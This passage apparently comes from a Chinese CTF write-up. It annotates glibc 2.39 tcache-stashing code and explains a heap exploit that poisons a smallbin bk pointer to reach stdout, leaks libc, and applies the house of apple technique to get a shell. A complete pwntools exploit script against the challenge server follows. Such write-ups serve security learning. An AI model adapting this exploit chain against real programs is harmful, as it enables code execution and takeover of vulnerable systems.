	     stash them in the tcache.  */#翻译:在这里,如果看到其他相同大小的chunk,把它们放入tcache。
	  size_t tc_idx = csize2tidx (nb);#获取tcache中用户申请堆块大小的索引(为了确定把这些堆块放进tcache哪个链里)
	  if (tcache != NULL && tc_idx < mp_.tcache_bins)#如果存在tcache机制,这里的意思不是tcache里有堆块!至少2.39不是,并且如果这个索引tc_idx在tcache bin的范围里(mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;

	      /* While bin not empty and tcache not full, copy chunks over.  */#翻译:当bin不为空且tcache未满时,将chunks复制过去。
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = last (bin)) != bin)#tcache链表内数量不能多于mp_.tcache_count一般都是7,这里的bin还是smllbin的头,所以这里的意思是如果tc_victim是smallbin的头就断开循环,tc_victim为small bin中的最后一个堆块注意smallbin是FIFO机制,所以其实这里的最后是链表上的最后(靠近smallbin头)
		{
		  if (tc_victim != 0)
		    {
		      bck = tc_victim->bk;#用tc_victim的bk往后一直把堆块放进bck里,这里没有检查链表完整性!
		      set_inuse_bit_at_offset (tc_victim, nb);#之前解释了就不解释了
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;#注意这里的bin还是smallbin的头,这里还是smallbin进行脱链
		      bck->fd = bin;

		      tcache_put (tc_victim, tc_idx);#将tc_victim链入tcache里tc_idx索引对应的链
	            }
		}
	    }
#endif
          void *p = chunk2mem (victim);// 将chunk转换为用户可用内存
          alloc_perturb (p, bytes);
          return p;
        }
    }

所以可以看见,至少我看的2.39源码并没有要求tcache内至少有一个堆块才能触发tcache stashing,至少把堆块从smallbin放入tcache是不需要calloc这个函数触发tcache stashing的。

所以做法就很简单了,我们只需要申请足够的大小为0xc0堆先填满tcache,剩下的堆就会进unsortedbin,我们再申请0xa0的堆就会把unsortedbin的堆联入smallbin,这里注意要错位释放,因为smallbin中的堆块他的p位不恒为1,他是会进行合并的!然后我们该离smallbin头最远的堆块,也就是最后释放的堆块的bk指针,因为最后释放的堆块他是最后进tcache的,但因为tcache是LIFO机制,所以反而是最先取出来的,此时我们只需要爆破一个16进制位即可改到stdout。改到stdout我们把_IO_write_base最后一字节改成\x00让他泄露自己就可以打印出libc地址了,然后再用house of apple的手法对stdout进行一些布局就可以getshll了。不过libc是2.39,注意一下0x88要可访问即可。exp如下

#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
libc = ELF('./libc.so.6')
flag = 1
if flag:
    p=remote("pwn-650d8783e4.adworld.xctf.org.cn", 9999, ssl=True)
else:
    p = process("./pwn")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
def edit(s,a):
    ru(b"Your choice > ")
    slr(3)
    ru(b"input index: ")
    slr(s)
    ru(b"Data: ")
    sd(a)
def add(s,a):
    ru(b"Your choice > ")
    slr(1)
    ru(b"input index: ")
    slr(s)
    ru(b"1. 0xd0\n2. 0xa0\n3. 0x510\n4. 0x520\nchoice: ")
    slr(a)
def free(s):
    ru(b"Your choice > ")
    slr(2)
    ru(b"input index: ")
    slr(s)
    ru(b"Chunk freed.")
#1: 0xc0 2:0xf0 3:0x500 4:0x510
for i in range(16):
    add(i,1)
for j in [0, 2, 4, 6, 8, 10, 14]:
    free(j)
for j in [1, 3, 5, 7, 9, 11]:
    free(j)
free(13)
add(0,2)
for i in range(1,8):
    add(i,1)
edit(12,b'\x00'*0xc8+flat(0xd00,0)+p16(0x45b0))
add(8,1)
add(9,1)
pay=p64(0xfbad3887)+flat(0,0,0)+b'\x00'
edit(9,pay)
a=u6(6)-0x204644
libc.address=a
sy=libc.sym.system
std=libc.sym._IO_2_1_stdout_
pay=flat({
0x0:b'  sh',
0x28:1,
0x68:sy,
0x88:std+0x100,
0xd8:libc.sym._IO_wfile_jumps,
0xa0:std,
0xe0:std},filler=b'\x00')
edit(9,pay)
ti()

不过这个要爆破一个16进制位还是要爆破一会的